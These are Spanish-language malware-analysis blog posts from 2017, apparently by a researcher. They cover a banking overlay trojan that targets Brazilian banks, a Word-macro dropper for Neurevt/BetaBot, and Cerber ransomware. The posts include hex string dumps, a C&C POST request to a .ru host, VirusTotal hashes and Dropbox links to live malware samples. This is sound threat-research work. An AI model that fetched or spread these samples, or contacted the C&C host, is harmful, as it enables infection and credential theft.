<span style="font-family: "courier new" , "courier" , monospace;">07BFF480 37 36 44 30 76D0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0B130 53 61 6E 74 61 6E 64 65 Santande</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0B138 72 00 00 r.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A004 41 38 34 43 45 37 34 A84CE74</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A00C 38 42 43 37 30 33 35 32 8BC70352</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A014 46 38 32 31 35 36 38 46 F821568F</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A01C 33 43 31 39 36 41 41 41 3C196AAA</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A024 32 46 39 39 42 34 31 30 2F99B410</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A02C 42 37 39 43 46 30 30 37 B79CF007</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A034 33 33 41 31 33 30 44 46 33A130DF</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A03C 31 42 34 42 38 45 39 38 1B4B8E98</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A044 44 33 30 43 42 34 45 43 D30CB4EC</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A04C 30 34 34 39 38 44 33 34 04498D34</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A054 41 31 34 30 46 39 31 37 A140F917</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03C98 42 72 61 64 65 73 63 6F Bradesco</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CA0 20 4E 65 74 20 45 78 70 Net Exp</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CA8 72 65 73 73 20 28 42 72 ress (Br</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CB0 61 64 65 73 63 6F 20 4E adesco N</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CB8 65 74 20 45 78 70 72 65 et Expre</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CC0 73 73 29 00 ss).</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C06208 62 61 6E 63 6F 62 72 61 bancobra</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06210 73 69 6C 2E 63 6F 6D 00 sil.com.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A28C 41 70 6C 69 63 61 74 69 Aplicati</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A294 76 6F 20 42 72 61 64 65 vo Brade</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A29C 73 63 6F 00 sco.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div>
<br /></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">El malware corresponde a un screen Overlay, este monitorea el url que se esta visitando, y de acuerdo a las cadenas expuestas mas arriba, se despliegan falsos formularios en los cuales la victima ingresa las claves.</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtKMOgY0LB5LqWE8QgO4-kQqlRZxMrgu5pzw5qB0rWAU2mn6fE3AVfUX4zLn69zmrOCylxqw4NWmrlF5AKz29CFKSubPW-DkKFGe4oJE4gl1r8u2M6tBu0WAF1sEvkWYFyhDEtCS6G93s/s1600/16.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtKMOgY0LB5LqWE8QgO4-kQqlRZxMrgu5pzw5qB0rWAU2mn6fE3AVfUX4zLn69zmrOCylxqw4NWmrlF5AKz29CFKSubPW-DkKFGe4oJE4gl1r8u2M6tBu0WAF1sEvkWYFyhDEtCS6G93s/s320/16.jpg" width="320" /></a><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Muestra: </span><span style="font-family: "arial" , "helvetica" , sans-serif;">https://www.dropbox.com/s/3csafx6c0h46pc1/banload-27-03-17.rar?dl=0</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;">Es todo por el momento @Dkavalanche 2017</span><br />
<br />@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-58751861785673169002017-03-27T12:02:00.000-07:002017-03-27T12:18:17.160-07:00<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><b>Gracias por la Donación: Continúan los ataques con documentos word con Macros.</b></span><br />
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px;"></span><span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #444444;"></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #444444;">Al igual que en otros casos llega por correo spam con un zip con un documento .doc con macros maliciosas que descargan </span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><a href="http://www.virusradar.com/en/Win32_Neurevt.A/description">Neurevt</a></span></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ2ox5GbdmkKqDtjbhER2khDWjA4qY95cJPIgQrCm6X6azto3lkdJGxDfZ2TRI0CLEOCAjIw-R0uMm4_aMPeDYENm8xReQWk-7ceTKkk-oTMCNLtahfZKGDWgTBgBP83d-2223Ja4jSnM/s1600/00.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ2ox5GbdmkKqDtjbhER2khDWjA4qY95cJPIgQrCm6X6azto3lkdJGxDfZ2TRI0CLEOCAjIw-R0uMm4_aMPeDYENm8xReQWk-7ceTKkk-oTMCNLtahfZKGDWgTBgBP83d-2223Ja4jSnM/s640/00.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Una vez abierto el documento se solicita habilitar el contenido, apelando una vez más al descuido de la víctima.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiXQbQa89VYCYnH1XKEs9tWuHpF-k-O59Tb8Iob0DjPX2E5yOHIKFllLhtkwr4xudt-tJ0D740JvRsgTp6FEXa7J9c_F0cDEqGItQqheRsiBWpbxx_8U-t0uHknl0G68B0maVheIWmCnU/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiXQbQa89VYCYnH1XKEs9tWuHpF-k-O59Tb8Iob0DjPX2E5yOHIKFllLhtkwr4xudt-tJ0D740JvRsgTp6FEXa7J9c_F0cDEqGItQqheRsiBWpbxx_8U-t0uHknl0G68B0maVheIWmCnU/s640/02.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /><br />El macro, genera un .VBS que es el encargado de descargar el binario.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihOpSKdonyr5oEBEEFj5MxJF2V0ELnmClppbHmXHUOyPAYKNy7jJg9CsGZEixViUivOZS52H3fFHqg2GDoQQ4EfmdLW3xVSXcFoAV0o4s9zXGFltabyHjzzGwSIOpgF7Ih9G-xotUXL3o/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="574" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihOpSKdonyr5oEBEEFj5MxJF2V0ELnmClppbHmXHUOyPAYKNy7jJg9CsGZEixViUivOZS52H3fFHqg2GDoQQ4EfmdLW3xVSXcFoAV0o4s9zXGFltabyHjzzGwSIOpgF7Ih9G-xotUXL3o/s640/04.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4iqwGoYbyrWDRUto9RpGz-9ecVGBFSXNMcSqo3lBy46HdiGo-Dl-xamm84vBx_nKHve_GZivkC8tRcIWBxpjvK3YwnfEO0136v0WG4EhkPhYkoT0UgjBnczUE2zw47Z5E45dPnOIAqm0/s1600/vbs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4iqwGoYbyrWDRUto9RpGz-9ecVGBFSXNMcSqo3lBy46HdiGo-Dl-xamm84vBx_nKHve_GZivkC8tRcIWBxpjvK3YwnfEO0136v0WG4EhkPhYkoT0UgjBnczUE2zw47Z5E45dPnOIAqm0/s1600/vbs.jpg" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: arial, helvetica, sans-serif;">Quitamos los /***/ y obtenemos el sito de descarga http</span><br />
<span style="color: #444444; font-family: arial, helvetica, sans-serif;"><br /></span>
<span style="color: #444444; font-family: arial, helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMmqPWaE43ddj5nutfo2-ZnW5CFGObGiWcB6ZnAeaDL401lZP_B0A6fNSg0VUyCXd8Z8ZkmBRAmnapprzTBGJ_1HvSUCpZrjFz1CbzgXYc9_hBpSj-c9Xnfq1sc6MTsUnjfoa0dTswO1g/s1600/vbs3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMmqPWaE43ddj5nutfo2-ZnW5CFGObGiWcB6ZnAeaDL401lZP_B0A6fNSg0VUyCXd8Z8ZkmBRAmnapprzTBGJ_1HvSUCpZrjFz1CbzgXYc9_hBpSj-c9Xnfq1sc6MTsUnjfoa0dTswO1g/s1600/vbs3.jpg" /></a></div>
<span style="color: #444444; font-family: arial, helvetica, sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Análisis del binario descargado por la macro .doc</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">https://www.virustotal.com/es/file/eb2421b85cd190084f28ee861681e88f2bfe2f7237b6c5d780f03c2ba896d0c4/analysis/</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigLb6ZZFGfa6ZymjNkCDG8LBeZPSqTcRjJgfkRh6D_d6uc5cuW4eLG5r789OBAM_BT-2RjfNgpaKSI0KuSzXWF-yL3kACHA2pgHGnHGcUew4uzptn9IGXvdd3d4QEwMT-yu1SqXkGba88/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="622" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigLb6ZZFGfa6ZymjNkCDG8LBeZPSqTcRjJgfkRh6D_d6uc5cuW4eLG5r789OBAM_BT-2RjfNgpaKSI0KuSzXWF-yL3kACHA2pgHGnHGcUew4uzptn9IGXvdd3d4QEwMT-yu1SqXkGba88/s640/01.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Quitamos la primera capa de ofuscación del código malicioso y obtenemos una muestra "más limpia"</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJduFwHw2HoViX9ZlmlOdM6MZLmdj-6fSKYXsekalzij1KggsPamjFOWDkvm7v7sxfhbTzkgIrYywsYLUERddN7CTkqm6UHdTFCMzR4wXDV-ysyviJi8mUvhOaVrcpc6XtPOKR5AQLXlM/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJduFwHw2HoViX9ZlmlOdM6MZLmdj-6fSKYXsekalzij1KggsPamjFOWDkvm7v7sxfhbTzkgIrYywsYLUERddN7CTkqm6UHdTFCMzR4wXDV-ysyviJi8mUvhOaVrcpc6XtPOKR5AQLXlM/s640/03.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">https://virustotal.com/es/file/8394e9f616b66070385572fa54d11bd22a7913dd9dfedac298eef5bb16640f78/analysis/1490299891/</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span id="goog_1976611851"></span><span id="goog_1976611852"></span><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>Reporte al sitio de C&C</b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">"POST <b>/kin/logout.php</b> HTTP/1.1</span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">Content-Type: application/x-www-form-urlencoded</span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)</span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">Host: <b>nwefbnujngohreogojgr.ru</b></span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">Content-Length: 1111</span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">Cache-Control: no-cache" with no payload</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Esta amenaza puede ser utilizada para robar información de la PC como también controlarla remotamente, o subir un Ransomware.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Muestra: https://www.dropbox.com/s/fic9oudzsd2lckt/BetaBot%2023-03-17.rar?dl=0</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;">Es todo por el momento @Dkavalanche 2017</span></span><br />
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></span></div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com1tag:blogger.com,1999:blog-4220472203730425546.post-5481383885541745612017-01-25T10:24:00.001-08:002017-01-25T10:24:30.102-08:00<span style="font-family: Arial, Helvetica, sans-serif;"><b>CERBER #Ransomware II: Continúan los ataques con documentos word con Macros.</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Al igual que en otros casos llega por correo spam con un zip con un documento .doc</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji5JI7RV6Un-B-U_Rm6N3BSbVnqdlfaxUpXT8rYnIMfUQtKSKxVrB9FoaDetxvSoJ9RKD7o_dT_anaBdxWGdSqjhvFlUeteyhqaiio1yh7gpBAOiFVr8aSvrZ1FL53-MZDJYwG_IXuRsk/s1600/01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji5JI7RV6Un-B-U_Rm6N3BSbVnqdlfaxUpXT8rYnIMfUQtKSKxVrB9FoaDetxvSoJ9RKD7o_dT_anaBdxWGdSqjhvFlUeteyhqaiio1yh7gpBAOiFVr8aSvrZ1FL53-MZDJYwG_IXuRsk/s640/01.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">El documento tiene macros y apela a que la victima active le ejecución, cosa que muchos hacen.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRgHc10MHpLvK40bHjX8PuFekujLOe-sfAX0u853p90pU-6t_ZVBDdNS9v6CnJCIG-tZDsEfKYoM6K5ImqC2S_4mE50-BYSHJQbu6QJPRYSy5ibDX0LCaDTnTfopdTI2AeDljCTkigOkc/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRgHc10MHpLvK40bHjX8PuFekujLOe-sfAX0u853p90pU-6t_ZVBDdNS9v6CnJCIG-tZDsEfKYoM6K5ImqC2S_4mE50-BYSHJQbu6QJPRYSy5ibDX0LCaDTnTfopdTI2AeDljCTkigOkc/s640/01.jpg" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Lo curioso es que los macros funcionan en entornos de 64bits.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSCMVIskva04zlr7gxiTEXhX87QjcXzasANn-4Jr4LOCJ-lycFm_QAEPPVrghMmLBeoA_YSrWa_gtY_GlrK_mkuID1rtb6gOBXn6dgI1loaTlL4yw4xF3b_otA8w1u1x_Zrz4YW0WoJoo/s1600/macro64b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSCMVIskva04zlr7gxiTEXhX87QjcXzasANn-4Jr4LOCJ-lycFm_QAEPPVrghMmLBeoA_YSrWa_gtY_GlrK_mkuID1rtb6gOBXn6dgI1loaTlL4yw4xF3b_otA8w1u1x_Zrz4YW0WoJoo/s640/macro64b.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí modifique la función para que me funcionara en mi entorno de pruebas de 32bits.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvm4mPw_w4TjKs9CVySQz3xUHbH3xyUaLN9EV5oOjI2kzV-p98WWHPCwUe1N582r36YyzrkRfJihbl4ZR6Oel-ISiqqFSX1MLuzYRXakog1F4j3XxbaeDZWk9MrLGW1pi6sM4yyqNTBhc/s1600/macro32b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvm4mPw_w4TjKs9CVySQz3xUHbH3xyUaLN9EV5oOjI2kzV-p98WWHPCwUe1N582r36YyzrkRfJihbl4ZR6Oel-ISiqqFSX1MLuzYRXakog1F4j3XxbaeDZWk9MrLGW1pi6sM4yyqNTBhc/s400/macro32b.jpg" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"> Trafico de descarga del malware por la macro.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRtEVoCGDv-bcK_bBeUIO6g5jXYHDWCiamuZC5b55uINOOUnJY5W12qSGHAXliI5vWiFTvevoEGw6LcnGMZxD-wJskAViEYDe2NQBYTDy_Nabo3dAej0_1HvOPIDF1HqQWnuj-vPgKwcs/s1600/trafico.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRtEVoCGDv-bcK_bBeUIO6g5jXYHDWCiamuZC5b55uINOOUnJY5W12qSGHAXliI5vWiFTvevoEGw6LcnGMZxD-wJskAViEYDe2NQBYTDy_Nabo3dAej0_1HvOPIDF1HqQWnuj-vPgKwcs/s640/trafico.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisickPukLe1JyC7G7e80HJhrhEDz_lC30qYjJ-itWGIGed7RqHl1F6xwnc6WMwa06ruQ9jYgqZOER-cJUbyxTDKl653vHm3Qf2RL_2sfOV9IYmxxsUhh5dCAgTdgw1xQQiMa0AK_VkXgo/s1600/MAlz.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisickPukLe1JyC7G7e80HJhrhEDz_lC30qYjJ-itWGIGed7RqHl1F6xwnc6WMwa06ruQ9jYgqZOER-cJUbyxTDKl653vHm3Qf2RL_2sfOV9IYmxxsUhh5dCAgTdgw1xQQiMa0AK_VkXgo/s640/MAlz.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Luego de la infección los archivos son encriptados y se les cambia la extension por una random.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifdmeblR8EI8XBxJvMrRSA2t_pzfs5dg6zAfgjuoR6M5u8SqbQ_ERnzzoj_b3qQvEhPgO3B8T8LqhV-zmgT9yQQTW54zkRdhSUnrwgKEpFteIewX2pp854N-3dw_Cnny26JIAeOLgQnHI/s1600/extension.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifdmeblR8EI8XBxJvMrRSA2t_pzfs5dg6zAfgjuoR6M5u8SqbQ_ERnzzoj_b3qQvEhPgO3B8T8LqhV-zmgT9yQQTW54zkRdhSUnrwgKEpFteIewX2pp854N-3dw_Cnny26JIAeOLgQnHI/s640/extension.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Verificamos en el sitio id-ransomware a que familia pertenece.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRxF8DQNTjqpOtUUmdXaZB8e98X2FqAjA_e-h23PDOJkUWQM3yNpYdt2k0DS2YtV6_Ph1AjHx3e-xovOv46-gCIcezHxfMFEMHTJmNZ7A9R3Uff5aEioNYST1MsVWR6gGE75OWwwXlGTg/s1600/idransom.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRxF8DQNTjqpOtUUmdXaZB8e98X2FqAjA_e-h23PDOJkUWQM3yNpYdt2k0DS2YtV6_Ph1AjHx3e-xovOv46-gCIcezHxfMFEMHTJmNZ7A9R3Uff5aEioNYST1MsVWR6gGE75OWwwXlGTg/s640/idransom.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí realizamos un dump de la muestra y en la dirección de memoria 00AB000 encontramos parte de la configuración del ransomware.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
